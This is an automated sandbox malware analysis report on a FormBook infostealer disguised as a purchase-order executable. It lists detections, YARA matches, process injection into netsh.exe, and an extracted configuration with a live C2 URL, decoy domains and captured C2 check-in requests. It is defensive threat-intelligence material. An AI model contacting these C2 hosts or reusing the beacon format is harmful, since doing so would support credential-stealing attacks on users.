Analysis Report NEW ORDER SOR 10531220.exe

AV Detection:

Antivirus detection for URL or domain

Source: www.magnumopuspro.com/nyr/

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}

Multi AV Scanner detection for domain / URL

Source: www.magnumopuspro.com/nyr/

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for submitted file

Source: NEW ORDER SOR 10531220.exe	Virustotal: Detection: 60%			Perma Link
Source: NEW ORDER SOR 10531220.exe	Metadefender: Detection: 20%			Perma Link
Source: NEW ORDER SOR 10531220.exe	ReversingLabs: Detection: 51%

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: NEW ORDER SOR 10531220.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: NEW ORDER SOR 10531220.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: NEW ORDER SOR 10531220.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: netsh.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe, 0000000F.00000002.504469970.0000000000D20000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 4x nop then pop esi		3_2_004172F1
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 4x nop then pop edi		3_2_0040E429
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop esi		15_2_001872F1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi		15_2_0017E429

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.255.115.89:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.255.115.89:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.255.115.89:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.magnumopuspro.com/nyr/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /nyr/?hRXX=pvzb7SsULo7Y2vRo6lGAqy8tja7/7li767PDw0IqJEj7KBKEBSl8rkLevIquA9l06aH5&VBZDH=6l68xBo0LhJD2lv HTTP/1.1Host: www.chjcsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nyr/?VBZDH=6l68xBo0LhJD2lv&hRXX=17hAXKnq4LEoTdb/hcwwVfWjS4IYRgMdOmXX52SprwB/nueYqi9a5dgIoxBN3QmuetP3 HTTP/1.1Host: www.theglasshousenyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /nyr/?hRXX=pvzb7SsULo7Y2vRo6lGAqy8tja7/7li767PDw0IqJEj7KBKEBSl8rkLevIquA9l06aH5&VBZDH=6l68xBo0LhJD2lv HTTP/1.1Host: www.chjcsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nyr/?VBZDH=6l68xBo0LhJD2lv&hRXX=17hAXKnq4LEoTdb/hcwwVfWjS4IYRgMdOmXX52SprwB/nueYqi9a5dgIoxBN3QmuetP3 HTTP/1.1Host: www.theglasshousenyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.socialdating24.com

URLs found in memory or binary data

Source: NEW ORDER SOR 10531220.exe	String found in binary or memory: Http://google.com.br
Source: NEW ORDER SOR 10531220.exe	String found in binary or memory: Http://google.com.bre45766964656E6365557067726164654C6F636B486F6C646572%4A6535325178727349
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244487250.0000000002EE1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244063778.0000000001318000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: NEW ORDER SOR 10531220.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00419D60 NtCreateFile,		3_2_00419D60
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00419E10 NtReadFile,		3_2_00419E10
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00419E90 NtClose,		3_2_00419E90
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00419F40 NtAllocateVirtualMemory,		3_2_00419F40
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00419D5A NtCreateFile,		3_2_00419D5A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89840 NtDelayExecution,LdrInitializeThunk,		15_2_00D89840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89860 NtQuerySystemInformation,LdrInitializeThunk,		15_2_00D89860
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D895D0 NtClose,LdrInitializeThunk,		15_2_00D895D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D899A0 NtCreateSection,LdrInitializeThunk,		15_2_00D899A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89540 NtReadFile,LdrInitializeThunk,		15_2_00D89540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89910 NtAdjustPrivilegesToken,LdrInitializeThunk,		15_2_00D89910
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D896D0 NtCreateKey,LdrInitializeThunk,		15_2_00D896D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D896E0 NtFreeVirtualMemory,LdrInitializeThunk,		15_2_00D896E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89A50 NtCreateFile,LdrInitializeThunk,		15_2_00D89A50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89FE0 NtCreateMutant,LdrInitializeThunk,		15_2_00D89FE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89780 NtMapViewOfSection,LdrInitializeThunk,		15_2_00D89780
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89710 NtQueryInformationToken,LdrInitializeThunk,		15_2_00D89710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D898F0 NtReadVirtualMemory,		15_2_00D898F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D898A0 NtWriteVirtualMemory,		15_2_00D898A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D8B040 NtSuspendThread,		15_2_00D8B040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89820 NtEnumerateKey,		15_2_00D89820
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D899D0 NtCreateProcessEx,		15_2_00D899D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D895F0 NtQueryInformationFile,		15_2_00D895F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89950 NtQueueApcThread,		15_2_00D89950
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89560 NtWriteFile,		15_2_00D89560
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D8AD30 NtSetContextThread,		15_2_00D8AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89520 NtWaitForSingleObject,		15_2_00D89520
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89A80 NtOpenDirectoryObject,		15_2_00D89A80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89650 NtQueryValueKey,		15_2_00D89650
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89670 NtQueryInformationProcess,		15_2_00D89670
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89660 NtAllocateVirtualMemory,		15_2_00D89660
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89610 NtEnumerateValueKey,		15_2_00D89610
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89A10 NtQuerySection,		15_2_00D89A10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89A00 NtProtectVirtualMemory,		15_2_00D89A00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89A20 NtResumeThread,		15_2_00D89A20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D8A3B0 NtGetContextThread,		15_2_00D8A3B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D897A0 NtUnmapViewOfSection,		15_2_00D897A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89770 NtSetInformationFile,		15_2_00D89770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D8A770 NtOpenThread,		15_2_00D8A770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89760 NtOpenProcess,		15_2_00D89760
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D8A710 NtOpenProcessToken,		15_2_00D8A710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89B00 NtSetValueKey,		15_2_00D89B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D89730 NtQueryVirtualMemory,		15_2_00D89730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00189D60 NtCreateFile,		15_2_00189D60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00189E10 NtReadFile,		15_2_00189E10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00189E90 NtClose,		15_2_00189E90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00189D5A NtCreateFile,		15_2_00189D5A

Detected potential crypto function

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 0_2_0130C2B0		0_2_0130C2B0
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 0_2_01309990		0_2_01309990
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 0_2_0130FCB0		0_2_0130FCB0
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 0_2_0130FCC0		0_2_0130FCC0
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041E853		3_2_0041E853
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041D07C		3_2_0041D07C
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041E00E		3_2_0041E00E
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00401030		3_2_00401030
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_0041EA8B		3_2_0041EA8B
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00402D87		3_2_00402D87
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00402D90		3_2_00402D90
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00409E40		3_2_00409E40
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00409E3C		3_2_00409E3C
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Code function: 3_2_00402FB0		3_2_00402FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5B090		15_2_00D5B090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E120A8		15_2_00E120A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D720A0		15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5841F		15_2_00D5841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E01002		15_2_00E01002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5D5E0		15_2_00D5D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D72581		15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E11D55		15_2_00E11D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4F900		15_2_00D4F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E12D07		15_2_00E12D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D40D20		15_2_00D40D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D64120		15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E12EF7		15_2_00E12EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E122AE		15_2_00E122AE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D66E30		15_2_00D66E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E11FF1		15_2_00E11FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0DBD2		15_2_00E0DBD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7EBB0		15_2_00D7EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E12B28		15_2_00E12B28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018E00E		15_2_0018E00E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_0018D07C		15_2_0018D07C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00172D90		15_2_00172D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00172D87		15_2_00172D87
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00179E3C		15_2_00179E3C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00179E40		15_2_00179E40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00172FB0		15_2_00172FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\netsh.exe

Code function: String function: 00D4B150 appears 35 times

Sample file is different than original file name gathered from version info

Source: NEW ORDER SOR 10531220.exe, 00000000.00000000.233223977.0000000000B56000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244063778.0000000001318000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.248937726.00000000062F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244487250.0000000002EE1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000002.00000000.240632368.00000000000F6000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306240737.000000000136F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000003.00000002.305760685.00000000006B6000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310682715.0000000002E6C000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetsh.exej% vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe	Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe

Uses 32bit PE files

Source: NEW ORDER SOR 10531220.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
